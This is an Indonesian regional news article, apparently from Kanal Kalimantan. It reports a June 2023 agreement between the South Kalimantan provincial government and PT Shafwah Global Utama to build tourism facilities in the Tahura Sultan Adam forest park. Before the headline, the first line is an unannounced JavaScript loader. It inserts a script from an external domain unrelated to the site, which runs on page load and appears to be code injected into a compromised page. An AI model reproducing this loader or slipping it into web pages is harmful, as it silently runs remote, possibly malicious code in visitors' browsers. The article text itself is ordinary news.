(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Tahura Sultan Adam Gandeng Swasta, Hadirkan Wahana Paintball hingga Jet Ski


KANALKALIMANTAN.COM, BANJARBARU – Pemerintah Provinsi (Pemprov) Kalimantan Selatan (Kalsel) menjalin kerjasama dengan PT Shafwah Global Utama untuk mengembangkan sarana dan prasarana wisata Taman Hutan Raya (Tahura) Sultan Adam.

Penandatanganan kerjasama dilakukan Kepala UPTD Tahura Sultan Adam Ainun Jariah dan Direktur Keuangan Shafwah Global Utama Faradina disaksikan Kepala Biro Perekonomian Setdaprov Kalsel Hj Raudatul Jannah di Tahura Sultan Adam, Kamis (15/6/2023) siang.

Ruang lingkup kerjasama Tahura Sultan Adam dan PT Shafwah Global Utama antara lain, menyediakan sarana prasarana wisata dan jasa wisata alam. Pemberdayaan masyarakat sekitar, menyelenggarakan event ecotourism nasional dan internasional, pengembangan sistem digital dalam pengelolaan wahana wisata. Dan terlibat aktif dalam kegiatan pelestarian keanekaragaman hayati.

Adapun rencana program pengembangan wisata alam di Tahura Sultan Adam akan dilaksanakan di Mandiangin, Kecamatan Karang Intan dan wisata Bukit Batu, Kecamatan Aranio. Dua kawasan wisata unggulan Kalsel yang masuk dalam kawasan Tahura Sultan Adam.

Baca juga: Bocoran Putusan Sistem Pemilu di MK Tak Terbukti, Denny Indrayana ‘Dirujak’ Warganet

Untuk di Mandiangin terdapat glamping, cafe, wahana permainan anak, outbound, paintball. Sedangkan di Bukit Batu terdapat resort, camping ground, jet ski, wahana permainan air.

Nilai investasi yang akan diberikan oleh PT Shafwah Global Utama untuk program pengembangan wisata alam di Tahura Sultan Adam sebesar Rp 24 hingga 30 miliar.

Pemprov Kalsel menjalin kerjasama dengan PT Shafwah Global Utama untuk mengembangkan sarana dan prasarana wisata Tahura Sultan Adam. Foto: adpim

Kepala Biro Perekonomian Setdaprov Kalsel Hj Raudatul Jannah mengatakan, pengembangan wisata menjadi salah satu prioritas pembangunan Kalimantan Selatan yang akan meningkatkan perekonomian.

“Pasti akan meningkatkan perekonomian, karena nantinya akan banyak kunjungan,” katanya.

Baca juga: Pamit Main Sendiri, Bocah 10 Tahun Nyaris Tenggelam di Irigasi Sekumpul

Salah satu poin penting dalam perjanjian kerjasama ini adalah pemberdayaan masyarakat.

Menurut Hj Raudatul Jannah, dengan pemberdayaan masyarakat maka akan berdampak meningkatnya kesempatan kerja. “Masyarakat bisa mengantar wisatawan, jaga keamanan dan yang lainya,” katanya.

Tempat bersantai di kawasan puncak Gunung Besar Mandiangin, Tahura Sultan Adam. Foto: dok.kanalkalimantan  

Istri Gubernur Kalsel Sahbirin Noor ini berharap, kerjasama dengan menggandeng pihak ketiga akan terus berlanjut untuk meningkatkan perekonomian di Banua.

Sementara itu, Kepala Dinas Kehutanan Provinsi Kalsel Hj Fatimatuzzahra mengatakan, sesuai arahan Gubernur Kalsel agar membuat terobosan dalam peningkatan pendapatan asli daerah.

Baca juga: 8 Banding 1 Putusan MK Sistem Pemilu Terbuka, 2024 Tetap Bisa Coblos Parpol atau Nama Caleg

Terobosan itu melalui pengembangan ekowisata baru maupun peningkatan fasiltas-fasilitas ekowisata yang sudah ada untuk meningkatkan kunjungan wisata yang akan berdampak terhadap peningkatan kesejahteraan masyarakat sekitar. (Kanalkalimantan.com/al)

Reporter : al
Editor : kk


Risa

Recent Posts

Dua Raperda Disahkan, Ketua DPRD: Payung Hukum yang Jelas Bagi Cagar Budaya di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dua buah Rancangan Peraturan Daerah (Raperda) Kota Banjarbaru disahkan dalam rapat paripurna… Read More

2 jam ago

Ibu Ruli Terima Kursi Roda Bantuan Polsek Banjarbaru Utara

KANALKALIMANTAN.COM, BANJARBARU - Bentuk kepedulian terhadap masyarakat, Unit Binmas Polsek Banjarbaru Utara memberikan bantuan sebuah… Read More

4 jam ago

Ini Alasan Pemko Banjarbaru Larang Peternakan Babi Ada di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Aktivitas peternakan babi di Kota Banjarbaru kembali menjadi sorotan. Selain dikeluhkan atas… Read More

6 jam ago

Habisi Nyawa Sesama Sopir di Banjarmasin, ARM Ditangkap di Kandangan

KANALKALIMANTAN.COM.COM, BANJARMASIN - Kepolisian Reskrim Polsek Banjarmasin Barat dan tim gabungan berhasil menangkap ARM (21),… Read More

7 jam ago

Peternak Babi di Pandarapan Keberatan Batas Waktu Tiga Bulan Bongkar Kandang

KANALKALIMANTAN.COM, BANJARBARU - Puluhan peternak babi di Jalan Pandarapan RT 34 RW 5, Kelurahan Guntung… Read More

7 jam ago

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

21 jam ago

This website uses cookies.